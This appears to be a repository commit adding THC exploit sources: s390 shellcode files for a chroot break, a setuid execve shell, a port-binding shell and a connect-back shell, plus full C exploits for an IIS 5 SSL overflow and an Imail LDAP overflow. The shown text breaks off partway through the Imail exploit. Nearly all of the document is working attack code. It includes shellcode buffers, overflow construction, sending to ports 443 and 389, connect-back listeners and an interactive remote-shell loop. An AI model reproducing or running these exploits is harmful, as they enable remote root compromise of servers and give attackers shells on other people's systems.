initial push of all stuff :)

Exploits/390chroot.c

@@ -0,0 +1,65 @@
+/*----------------------------------------------------------------------*/
+/* s390 shellcode 0x0a / 0x0 free					*/
+/* setuid / setgid / chroot break					*/
+/* code jcyberpunk@thehackerschoice.com					*/
+/*----------------------------------------------------------------------*/
+char shellcode[] =
+"\x0d\x10"		/* basr	%r1,0					*/
+"\x41\x90\x10\x98"	/* la	%r9,152(%r1)				*/
+"\xa7\xa8\xfb\xb4"	/* lhi	%r10,-1100				*/
+"\xa7\x68\x04\x56"	/* lhi	%r6,1110				*/
+"\x1a\x6a"		/* ar	%r6,%r10				*/
+"\x42\x60\x10\x98"	/* stc	%r6,152(%r1)				*/
+"\x17\x22"		/* xr	%r2,%r2					*/
+"\x42\x20\x10\x9f"	/* stc	%r2,159(%r1)				*/
+"\x0d\xe9"		/* basr	%r14,%r9				*/
+"\xa7\x68\x04\x7a"	/* lhi	%r6,1146				*/
+"\x1a\x6a"		/* ar	%r6,%r10				*/
+"\x42\x60\x10\x99"	/* stc	%r6,153(%r1)				*/
+"\x0d\xe9"		/* basr	%r14,%r9				*/
+"\x41\x20\x10\x9c"	/* la	%r2,156(%r1)				*/
+"\x17\x33"		/* xr	%r3,%r3					*/
+"\xa7\x68\x04\x73"	/* lhi	%r6,1139				*/
+"\x1a\x6a"		/* ar	%r6,%r10				*/
+"\x42\x60\x10\x99"	/* stc	%r6,153(%r1)				*/
+"\x0d\xe9"		/* basr	%r14,%r9				*/
+"\x41\x20\x10\x9c"	/* la	%r2,156(%r1)				*/
+"\xa7\x68\x04\x89"	/* lhi	%r6,1161				*/
+"\x1a\x6a"		/* ar	%r6,%r10				*/
+"\x42\x60\x10\x99"	/* stc	%r6,153(%r1)				*/
+"\x0d\xe9"		/* basr	%r14,%r9				*/
+"\xa7\xb8\x05\x39"	/* lhi	%r11,1337				*/
+"\x1a\xba"		/* ar	%r11,%r10				*/
+"\xa7\x68\x04\x58"	/* lhi	%r6,1112				*/
+"\x1a\x6a"		/* ar	%r6,%r10				*/
+"\x42\x60\x10\x99"	/* stc	%r6,153(%r1)				*/
+"\x41\x20\x10\x9d"	/* la	%r2,157(%r1)				*/
+"\x0d\xe9"		/* basr	%r14,%r9				*/
+"\x46\xb0\x10\x58"	/* bct	%r11,88(%r1)				*/
+"\x41\x20\x10\x9e"	/* la	%r2,158(%r1)				*/
+"\xa7\x68\x04\x89"	/* lhi	%r6,1161				*/
+"\x1a\x6a"		/* ar	%r6,%r10				*/
+"\x42\x60\x10\x99"	/* stc	%r6,153(%r1)				*/
+"\x0d\xe9"		/* basr %r14,%r9				*/
+"\xa7\x68\x04\x57"	/* lhi	%r6,1111				*/
+"\x1a\x6a"		/* ar	%r6,%r10				*/
+"\x42\x60\x10\x99"	/* stc	%r6,153(%r1)				*/
+"\x41\x20\x10\xa0"	/* la	%r2,160(%r1)				*/
+"\x50\x20\x10\xa8"	/* st	%r2,168(%r1)				*/
+"\x41\x30\x10\xa8"	/* la	%r3,168(%r1)				*/
+"\x17\x44"		/* xr	%r4,%r4					*/
+"\x42\x40\x10\xa7"	/* stc	%r4,167(%r1)				*/
+"\x50\x40\x10\xac"	/* st	%r4,172(%r1)				*/
+"\x41\x40\x10\xac"	/* la	%r4,172(%r1)				*/
+"\x0d\xe9"		/* basr %r14,%r9				*/
+"\x0b\x17"		/* svc  23 		<--- after modification	*/
+"\x07\xfe"		/* br	%r14					*/
+"\x41\x2e\x2e\x5c"	/* A..	<---- used for mkdir,chroot,chdir	*/
+"\x2f\x62\x69\x6e"	/* /bin						*/
+"\x2f\x73\x68\x5c";	/* /sh\\					*/
+
+main()
+{
+ void (*z)()=(void*)shellcode;
+ z();
+}

Exploits/390connectback.c

@@ -0,0 +1,75 @@
+/*----------------------------------------------------------------------*/
+/* s390 shellcode 0x0a / 0x0 free                                       */
+/* connectback shell, use netcat listener from caller : nc -l -p 31337	*/
+/* ATTENTION ! altough the code is 0x0a and 0x0 free it may be the case */
+/* that u wanna connect an ip like : 10.65.120.22 ( in our example ! )  */
+/* our 192.168.0.1 ! in these cases u have 0xa and 0x0 in your address  */
+/* and u should conside to add some selfmodifing code where u patch the */
+/* ip address values on the fly, like i did with the svc calls		*/
+/* code jcyberpunk@thehackerschoice.com                                 */
+/*----------------------------------------------------------------------*/
+char shellcode[] =
+"\x0d\x10"              	/* basr    %r1,%r0			*/
+"\x41\x90\x10\xa8"          	/* la      %r9,168(%r1)			*/
+"\xa7\x68\x04\x56"           	/* lhi     %r6,1110			*/
+"\xa7\xa8\xfb\xb4"            	/* lhi     %r10,-1100			*/
+"\x1a\x6a"                  	/* ar      %r6,%r10			*/
+"\x42\x60\x10\xa8"            	/* stc     %r6,168(%r1)			*/
+"\xa7\x28\x04\x4e"            	/* lhi     %r2,1102			*/
+"\x1a\x2a"                 	/* ar      %r2,%r10			*/
+"\x40\x20\xf0\x78"            	/* sth     %r2,120(%r15)		*/
+"\xa7\x38\x7a\x69"            	/* lhi     %r3,31337			*/
+"\x40\x30\xf0\x7a"           	/* sth     %r3,122(%r15)		*/
+"\x58\x40\x10\xac"            	/* l       %r4,172(%r1)			*/
+"\x50\x40\xf0\x7c"             	/* st      %r4,124(%r15)		*/
+"\x17\x44"                  	/* xr      %r4,%r4			*/
+"\xa7\x38\x04\x4d"             	/* lhi     %r3,1101			*/
+"\x1a\x3a"                   	/* ar      %r3,%r10			*/
+"\x90\x24\xf0\x80"            	/* stm     %r2,%r4,128(%r15)		*/
+"\xa7\x28\x04\x4d"            	/* lhi     %r2,1101			*/
+"\x1a\x2a"                  	/* ar      %r2,%r10			*/
+"\x41\x30\xf0\x80"            	/* la      %r3,128(%r15)		*/
+"\x0d\xe9"                   	/* basr    %r14,%r9			*/
+"\x18\x72"                   	/* lr      %r7,%r2			*/
+"\x41\x30\xf0\x78"            	/* la      %r3,120(%r15)		*/
+"\xa7\x88\x04\x5c"            	/* lhi     %r8,1116			*/
+"\x1a\x8a"                  	/* ar      %r8,%r10			*/
+"\x18\x48"                  	/* lr      %r4,%r8			*/
+"\x90\x24\xf0\x80"              /* stm     %r2,%r4,128(%r15)		*/
+"\xa7\x28\x04\x4f"              /* lhi     %r2,1103			*/
+"\x1a\x2a"                  	/* ar      %r2,%r10			*/
+"\x41\x30\xf0\x80"            	/* la      %r3,128(%r15)		*/
+"\x0d\xe9"                   	/* basr    %r14,%r9			*/
+"\x18\x27"                   	/* lr      %r2,%r7			*/
+"\xa7\x68\x04\x8b"             	/* lhi     %r6,1163			*/
+"\x1a\x6a"                   	/* ar      %r6,%r10			*/
+"\x42\x60\x10\xa9"              /* stc     %r6,169(%r1)			*/
+"\xa7\x38\x04\x4e"            	/* lhi     %r3,1102			*/
+"\x1a\x3a"                   	/* ar      %r3,%r10			*/
+"\x0d\xe9"                   	/* basr    %r14,%r9			*/
+"\xa7\x3a\xff\xff"           	/* ahi     %r3,-1			*/
+"\x0d\xe9"                   	/* basr    %r14,%r9			*/
+"\xa7\x3a\xff\xff"          	/* ahi     %r3,-1			*/
+"\x0d\xe9"                   	/* basr    %r14,%r9			*/
+"\xa7\x68\x04\x57"            	/* lhi     %r6,1111			*/
+"\x1a\x6a"                   	/* ar      %r6,%r10			*/
+"\x42\x60\x10\xa9"             	/* stc     %r6,169(%r1)			*/
+"\x41\x20\x10\xb0"             	/* la      %r2,176(%r1)			*/
+"\x50\x20\x10\xb8"             	/* st      %r2,184(%r1)			*/
+"\x41\x30\x10\xb8"             	/* la      %r3,184(%r1)			*/
+"\x17\x44"                  	/* xr      %r4,%r4			*/
+"\x42\x40\x10\xb7"            	/* stc     %r4,183(%r1)			*/
+"\x50\x40\x10\xbc"            	/* st      %r4,188(%r1)			*/
+"\x41\x40\x10\xbc"             	/* la      %r4,188(%r1)			*/
+"\x0d\xe9"                   	/* basr    %r14,%r9			*/
+"\x0b\x66"                   	/* svc 102  <--- after modification	*/
+"\x07\xfe"                   	/* br      %r14				*/
+"\x0a\x41\x78\x16"             	/* ip-address to connect back		*/
+"\x2f\x62\x69\x6e"		/* /bin					*/
+"\x2f\x73\x68\x5c";		/* /sh\\				*/
+
+main()
+{
+ void (*z)()=(void*)shellcode;
+ z();
+}

Exploits/390execve.c

@@ -0,0 +1,39 @@
+/* setuid/setgid 0 execve s390 shellcode   			*/
+/* code by jcyberpunk@thehackerschoice.com 			*/
+
+char shellcode[]=
+"\x0c\x10"             	/* bassm	%r1,%r0			*/
+"\x41\x90\x10\x48"     	/* la		%r9,72(%r1)		*/
+"\xa7\xa8\xfb\xb4"     	/* lhi		%r10,-1100		*/
+"\xa7\x68\x04\x56"     	/* lhi		%r6,1110		*/
+"\x1a\x6a"             	/* ar 		%r6,%r10		*/
+"\x42\x60\x10\x48"     	/* stc		%r6,72(%r1)		*/
+"\x17\x22"             	/* xr		%r2,%r2			*/
+"\x0d\xe9"             	/* basr		%r14,%r9		*/
+"\xa7\x68\x04\x7a"     	/* lhi		%r6,1146		*/
+"\x1a\x6a"             	/* ar		%r6,%r10		*/
+"\x42\x60\x10\x49"     	/* stc		%r6,73(%r1)		*/
+"\x0d\xe9"             	/* basr		%r14,%r9		*/
+"\xa7\x68\x04\x57"     	/* lhi		%r6,1111		*/
+"\x1a\x6a"             	/* ar		%r6,%r10		*/
+"\x42\x60\x10\x49"     	/* stc		%r6,73(%r1)		*/
+"\x41\x20\x10\x4c"     	/* la		%r2,76(%r1)		*/
+"\x50\x20\x10\x54"     	/* st		%r2,84(%r1)		*/
+"\x41\x30\x10\x54"     	/* la		%r3,84(%r1)		*/
+"\x17\x44"             	/* xr		%r4,%r4			*/
+"\x42\x40\x10\x53"     	/* stc		%r4,83(%r1)		*/
+"\x50\x40\x10\x58"     	/* st		%r4,88(%r1)		*/
+"\x41\x40\x10\x58"     	/* la		%r4,88(%r1)		*/
+"\x0d\xe9"             	/* basr		%r14,%r9		*/
+"\x0b\x17"             	/* svc n after self-modification	*/
+"\x07\xfe"             	/* br		%r14			*/
+"\x2f\x62"             	/* /b					*/
+"\x69\x6e\x2f\x73"     	/* in/s					*/
+"\x68\x5c";		/* h\					*/
+
+main()
+{
+ void (*z)()=(void*)shellcode;
+ z();
+}
+

Exploits/390portbind.c

@@ -0,0 +1,82 @@
+/*----------------------------------------------------------------------*/
+/* s390 portbinding shellcode - svc opcode 0x0a free			*/
+/* code by jcyberpunk@thehackerschoice.com				*/
+/*----------------------------------------------------------------------*/
+char shellcode[]=
+"\x0d\x10"		/* basr    %r1,%r0				*/
+"\x41\x90\x10\xd4"	/* la      %r9,212(%r1)				*/
+"\xa7\x68\x04\x56"	/* lhi     %r6,1110				*/
+"\xa7\xa8\xfb\xb4"	/* lhi     %r10,-1100				*/
+"\x1a\x6a"		/* ar      %r6,%r10				*/
+"\x42\x60\x10\xd4"	/* stc     %r6,212(%r1)				*/
+"\xa7\x28\x04\x4e"	/* lhi     %r2,1102				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x40\x20\xf0\x78"	/* sth     %r2,120(%r15)			*/
+"\xa7\x38\x7a\x69"	/* lhi     %r3,31337				*/
+"\x40\x30\xf0\x7a"	/* sth     %r3,122(%r15)			*/
+"\x17\x44"		/* xr      %r4,%r4				*/
+"\x50\x40\xf0\x7c"	/* st      %r4,124(%r15)			*/
+"\xa7\x38\x04\x4d"	/* lhi     %r3,1101				*/
+"\x1a\x3a"		/* ar      %r3,%r10				*/
+"\x90\x24\xf0\x80"	/* stm     %r2,%r4,128(%r15)			*/
+"\xa7\x28\x04\x4d"	/* lhi     %r2,1101				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\x18\x72"		/* lr      %r7,%r2				*/
+"\x41\x30\xf0\x78"	/* la      %r3,120(%r15)			*/
+"\xa7\x88\x04\x5c"	/* lhi     %r8,1116				*/
+"\x1a\x8a"		/* ar      %r8,%r10				*/
+"\x18\x48"		/* lr      %r4,%r8				*/
+"\x90\x24\xf0\x80"	/* stm     %r2,%r4,128(%r15)			*/
+"\xa7\x28\x04\x4e"	/* lhi     %r2,1102				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\x18\x27"		/* lr      %r2,%r7				*/
+"\xa7\x38\x04\x4d"	/* lhi     %r3,1101				*/
+"\x1a\x3a"		/* ar      %r3,%r10				*/
+"\x90\x23\xf0\x80"	/* stm     %r2,%r3,128(%r15)			*/
+"\xa7\x28\x04\x50"	/* lhi     %r2,1104				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\x18\x27"		/* lr      %r2,%r7				*/
+"\x41\x30\xf0\x78"	/* la      %r3,120(%r15)			*/
+"\x90\x23\xf0\x80"	/* stm     %r2,%r3,128(%r15)			*/
+"\x50\x80\xf0\x88"	/* st      %r8,136(%r15)			*/
+"\xa7\x28\x04\x51"	/* lhi     %r2,1105				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\xa7\x68\x04\x8b"	/* lhi     %r6,1163				*/
+"\x1a\x6a"		/* ar      %r6,%r10				*/
+"\x42\x60\x10\xd5"	/* stc     %r6,213(%r1)				*/
+"\xa7\x38\x04\x4e"	/* lhi     %r3,1102				*/
+"\x1a\x3a"		/* ar      %r3,%r10				*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\xa7\x3a\xff\xff"	/* ahi     %r3,-1				*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\xa7\x3a\xff\xff"	/* ahi     %r3,-1				*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\xa7\x68\x04\x57"	/* lhi     %r6,1111				*/
+"\x1a\x6a"		/* ar      %r6,%r10				*/
+"\x42\x60\x10\xd5"	/* stc     %r6,213(%r1)				*/
+"\x41\x20\x10\xd8"	/* la      %r2,216(%r1)				*/
+"\x50\x20\x10\xe0"	/* st      %r2,224(%r1)				*/
+"\x41\x30\x10\xe0"	/* la      %r3,224(%r1)				*/
+"\x17\x44"		/* xr      %r4,%r4				*/
+"\x42\x40\x10\xdf"	/* stc     %r4,223(%r1)				*/
+"\x50\x40\x10\xe4"	/* st      %r4,228(%r1)				*/
+"\x41\x40\x10\xe4"	/* la      %r4,228(%r1)				*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\x0b\x66"		/* svc	   102 		<--- after modification	*/
+"\x07\xfe"		/* br      %r14					*/
+"\x2f\x62\x69\x6e"	/* /bin						*/
+"\x2f\x73\x68\x5c";	/* /sh\						*/
+
+main()
+{
+ void (*z)()=(void*)shellcode;
+ z();
+}

Exploits/THCIISSLame.c

@@ -0,0 +1,253 @@
+/*****************************************************************************/
+/* THCIISSLame 0.3 - IIS 5 SSL remote root exploit                           */
+/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org)                         */
+/* THC PUBLIC SOURCE MATERIALS                                               */
+/*                                                                           */
+/* Bug was found by Internet Security Systems                                */
+/* Reversing credits of the bug go to Halvar Flake                           */
+/*                                                                           */
+/* compile with MS Visual C++ : cl THCIISSLame.c                             */
+/*                                                                           */
+/* v0.3 - removed sleep[500]; and fixed the problem with zero ips/ports      */
+/* v0.2 - This little update uses a connectback shell !                      */
+/* v0.1 - First release with portbinding shell on 31337                      */
+/*                                                                           */
+/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak,  */
+/* scut, stealth, FtR and Random                                             */
+/*****************************************************************************/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <winsock2.h>
+
+#pragma comment(lib, "ws2_32.lib")
+
+#define jumper    "\xeb\x0f"
+#define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"
+
+char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";
+
+char shellcode[] =
+"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8"
+"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
+"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
+"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
+"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
+"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
+"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
+"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
+"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
+"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
+"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
+"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
+"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x45\x04\x35"
+"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x35\x93\x93"
+"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46"
+"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff"
+"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x55\xec\x8d"
+"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64"
+"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\xfe\xca\x01"
+"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53"
+"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a\xff\xff"
+"\x55\xe4";
+
+void usage();
+void shell(int sock);
+
+int main(int argc, char *argv[])
+{  
+  unsigned int i,sock,sock2,sock3,addr,rc,len=16;
+  unsigned char *badbuf,*p;
+  unsigned long offset = 0x6741a1cd;
+  unsigned long XOR = 0xffffffff;
+  unsigned long XORIP = 0x93939393;
+  unsigned short XORPORT = 0x9393;
+
+  unsigned short cbport;
+  unsigned long  cbip;
+
+  struct sockaddr_in mytcp;
+  struct hostent * hp;
+  WSADATA wsaData;
+
+  printf("\nTHCIISSLame v0.3 - IIS 5.0 SSL remote root exploit\n");
+  printf("tested on Windows 2000 Server german/english SP4\n");
+  printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");
+
+  if(argc<4 || argc>4)
+   usage();
+
+  badbuf = malloc(352);
+  memset(badbuf,0,352);
+
+  printf("\n[*] building buffer\n");
+
+  p = badbuf;
+
+  memcpy(p,sslshit,sizeof(sslshit));
+
+  p+=sizeof(sslshit)-1;
+  
+  strcat(p,jumper);
+
+  strcat(p,greetings_to_microsoft);
+
+  offset^=XOR;
+  strncat(p,(unsigned char *)&offset,4);
+
+  cbport = htons((unsigned short)atoi(argv[3]));
+  cbip = inet_addr(argv[2]);
+  cbport ^= XORPORT;
+  cbip ^= XORIP;
+  memcpy(&shellcode[2],&cbport,2);
+  memcpy(&shellcode[4],&cbip,4);
+
+  strcat(p,shellcode);
+  
+  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
+  {
+   printf("WSAStartup failed !\n");
+   exit(-1);
+  }
+  
+  hp = gethostbyname(argv[1]);
+
+  if (!hp){
+   addr = inet_addr(argv[1]);
+  }
+  if ((!hp)  && (addr == INADDR_NONE) )
+  {
+   printf("Unable to resolve %s\n",argv[1]);
+   exit(-1);
+  }
+
+  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+  if (!sock)
+  { 
+   printf("socket() error...\n");
+   exit(-1);
+  }
+  
+  if (hp != NULL)
+   memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
+  else
+   mytcp.sin_addr.s_addr = addr;
+
+  if (hp)
+   mytcp.sin_family = hp->h_addrtype;
+  else
+   mytcp.sin_family = AF_INET;
+
+  mytcp.sin_port=htons(443);
+
+  printf("[*] connecting the target\n");
+
+  rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
+  if(rc==0)
+  {
+      send(sock,badbuf,351,0);
+      printf("[*] exploit send\n");
+  
+      mytcp.sin_addr.s_addr = 0;
+      mytcp.sin_port=htons((unsigned short)atoi(argv[3]));
+
+      sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+      
+      rc=bind(sock2,(struct sockaddr *)&mytcp,16);
+      if(rc!=0)
+      {
+       printf("bind error() %d\n",WSAGetLastError());
+       exit(-1);
+      }
+   
+      rc=listen(sock2,1);
+      if(rc!=0)
+      {
+       printf("listen error()\n");
+       exit(-1);
+      }
+
+      printf("[*] waiting for shell\n");
+      sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len); 
+      if(sock3)
+      { 
+       printf("[*] Exploit successful ! Have fun !\n");
+       printf("[*] --------------------------------------------------------------------\n\n");
+       shell(sock3);
+      }
+  }
+  else
+  {
+   printf("\nCan't connect to ssl port 443!\n");
+   exit(-1);
+  }
+  
+  shutdown(sock,1);
+  closesocket(sock);
+  shutdown(sock,2);
+  closesocket(sock2);
+  shutdown(sock,3);
+  closesocket(sock3);
+
+  free(badbuf);
+
+  exit(0);
+}
+ 
+void usage()
+{
+ unsigned int a;
+ printf("\nUsage:  <victim-host> <connectback-ip> <connectback port>\n");
+ printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337\n\n");
+ exit(0);
+}
+
+void shell(int sock)
+{
+ int l;
+ char buf[1024];
+ struct timeval time;
+ unsigned long ul[2];
+
+ time.tv_sec = 1;
+ time.tv_usec = 0;
+
+ while (1)
+ {
+  ul[0] = 1;
+  ul[1] = sock;
+
+  l = select (0, (fd_set *)&ul, NULL, NULL, &time);
+  if(l == 1)
+  {  	
+   l = recv (sock, buf, sizeof (buf), 0);
+   if (l <= 0)
+   {
+    printf ("bye bye...\n");
+    return;
+   }
+  l = write (1, buf, l);
+   if (l <= 0)
+   {
+    printf ("bye bye...\n");
+    return;
+   }
+  }
+  else
+  {
+   l = read (0, buf, sizeof (buf));
+   if (l <= 0)
+   {
+    printf("bye bye...\n");
+    return;
+   }
+   l = send(sock, buf, l, 0);
+   if (l <= 0)
+   {
+    printf("bye bye...\n");
+    return;
+   }
+  }
+ }
+}

Exploits/THCimail.c

@@ -0,0 +1,266 @@
+/*****************************************************************************/
+/* THCimail 0.1 - Wind0wZ remote root exploit                                */
+/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org)                         */
+/* THC PUBLIC SOURCE MATERIALS                                               */
+/*                                                                           */
+/* Bug was found by idefense or some idefense slaves ;)                      */
+/* http://www.idefense.com/application/poi/display?id=74&type=vulnerabilities*/
+/*                                                                           */
+/* compile with MS Visual C++ : cl THCimail.c                                */
+/*                                                                           */
+/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak,  */
+/* scut, stealth, FtR and Random                                             */
+/*****************************************************************************/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <winsock2.h>
+
+#pragma comment(lib, "ws2_32.lib")
+
+char *WIN2KEN   = "\xc4\x2a\x02\x75";
+char *WIN2KPG   = "\xc4\x2a\xf9\x74";
+char *WINXPSP1G = "\xfe\x63\xa1\x71";
+
+#define jumper    "\xeb\x06\x4a\x43"
+
+char ldapshit[] = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20";
+
+char shellcode[] =
+"\x8b\x7c\x24\xfc\x83\xc7\x21\x33\xc9\xb2\x8f\x66\x81\xc1\x02"
+"\x02\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\x64\xac\xf5\xe6\x8d"
+"\x8a\xe3\xd6\x77\x92\x13\x51\x03\x5e\xc3\xff\x5b\x8c\x7f\xa8"
+"\xaf\xaf\xbf\x87\xd8\xdc\xbd\xd0\xbc\xbd\xa1\xcb\xc3\xc3\x8e"
+"\x64\x8a\x67\x76\x70\x70\x70\xd2\x0c\x62\xa5\xe5\xbf\xd6\xeb"
+"\x04\x8e\x04\xcf\x83\x04\xff\x93\x22\x04\xf7\x87\x02\xd0\xb3"
+"\x04\x94\x8e\x74\x04\xd4\xf7\x8e\x74\x04\xc4\x93\x8e\x76\x04"
+"\xdc\xab\x8e\x75\xdc\xde\xdd\x04\xd4\xaf\x8e\x74\xbe\x46\xce"
+"\xbe\x4f\x16\x04\xbb\x04\x8e\x71\x23\xbe\x4d\x5e\x6d\x0b\x4f"
+"\xfa\x78\x80\x39\xca\x8a\x02\xcb\xca\x8b\xe9\xb6\x9f\xfa\x6e"
+"\xe9\xbe\x9f\xd5\xd7\xd1\xd9\xdf\xdd\xa4\xc1\x9f\xce\x80\x38"
+"\x83\xc5\x04\x8b\x07\x8e\x77\x80\x39\xc2\x8a\x06\xcb\x02\x57"
+"\x71\xc2\x8a\xfa\x31\x71\xc2\x8b\xfb\xae\x71\xc2\xad\x02\xd2"
+"\x97\xdc\x70\x5f\x06\x48\xe5\x8b\xd7\x07\xca\x8a\x0f\xca\xf8"
+"\x85\x02\xd2\xfb\x0f\xe4\xa9\x9b\x66\xf7\x70\x70\x70\x06\x41"
+"\xbe\x54\xdc\xdc\xdc\xdc\xd9\xc9\xd9\x70\x5f\x18\xda\xd7\xe9"
+"\x06\xbf\xe5\x9f\xda\xd8\x70\xda\x5b\xc1\xd9\xd8\x70\xda\x43"
+"\xdc\xda\xd8\x70\xda\x5f\x18\x02\xca\x07\xdf\x70\xda\x6b\xda"
+"\xda\x70\xda\x67\x02\xcb\x8a\x83\x1b\xdc\xe7\xa1\xea\xf7\xea"
+"\xe7\xd3\xec\xe2\xeb\x1b\xbe\x5d\x02\xca\x43\x1b\xd8\xd8\xd8"
+"\xdc\xdc\x71\x49\x8e\x7d\xdd\x1b\x02\xca\xf7\xdf\x02\xca\x07"
+"\xdf\x3e\x87\xdc\xdc\xe5\x9f\x71\x41\xdd\xdc\xdc\xdc\xda\x70"
+"\xda\x63\xe5\x70\x70\xda\x6f";
+
+
+void usage();
+void shell(int sock);
+
+int main(int argc, char *argv[])
+{  
+  unsigned int i,sock,sock2,addr,os,ver,rc,IMAILVER;
+  unsigned char *finalbuffer,*crapbuf1,*crapbuf2;
+  unsigned int IMAIL6_7=60;
+  unsigned int IMAIL_8=68;
+
+  struct sockaddr_in mytcp;
+  struct hostent * hp;
+  WSADATA wsaData;
+
+  printf("\nTHCimail v0.1 - Imail LDAP exploit\n");
+  printf("tested on Imail 6-8\n");
+  printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");
+
+  if(argc<4 || argc>4)
+   usage();
+
+  ver = (unsigned short)atoi(argv[3]);  
+  switch(ver)
+  {
+   case 0:
+    IMAILVER = IMAIL6_7;
+    break;
+   case 1:
+    IMAILVER = IMAIL_8;
+    break;
+   default:
+    printf("\nYou entered an illegal version !\n\n");
+    usage();
+    exit(-1);
+  }
+
+  crapbuf1 = malloc(IMAILVER);
+  memset(crapbuf1,'X',IMAILVER);
+
+  printf("imailver = %d\n",IMAILVER);
+
+  crapbuf2 = malloc(2220);
+  memset(crapbuf2,'X',2220);
+
+  finalbuffer = malloc(2650);
+  memset(finalbuffer,0,2650);
+
+  printf("\n[*] building buffer\n");
+
+  strcat(finalbuffer,ldapshit);
+
+  strcat(finalbuffer,crapbuf1);
+
+  strcat(finalbuffer,jumper);
+
+  os = (unsigned short)atoi(argv[2]);  
+  switch(os)
+  {
+   case 0:
+    strcat(finalbuffer,WIN2KPG);
+    break;
+   case 1:
+    strcat(finalbuffer,WIN2KPG);
+    break;
+   case 2:
+    strcat(finalbuffer,WINXPSP1G);
+    break;
+   default:
+    printf("\nYou entered an illegal OS !\n\n");
+    usage();
+    exit(-1);
+  }
+
+  strcat(finalbuffer,shellcode);
+  strcat(finalbuffer,crapbuf2);
+      
+  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
+  {
+   printf("WSAStartup failed !\n");
+   exit(-1);
+  }
+  
+  hp = gethostbyname(argv[1]);
+
+  if (!hp){
+   addr = inet_addr(argv[1]);
+  }
+  if ((!hp)  && (addr == INADDR_NONE) )
+  {
+   printf("Unable to resolve %s\n",argv[1]);
+   exit(-1);
+  }
+
+  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+  if (!sock)
+  { 
+   printf("socket() error...\n");
+   exit(-1);
+  }
+  
+  if (hp != NULL)
+   memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
+  else
+   mytcp.sin_addr.s_addr = addr;
+
+  if (hp)
+   mytcp.sin_family = hp->h_addrtype;
+  else
+   mytcp.sin_family = AF_INET;
+
+  mytcp.sin_port=htons(389);
+
+  printf("[*] connecting the target\n");
+
+  rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
+  if(rc==0)
+  {
+      send(sock,finalbuffer,2650,0);
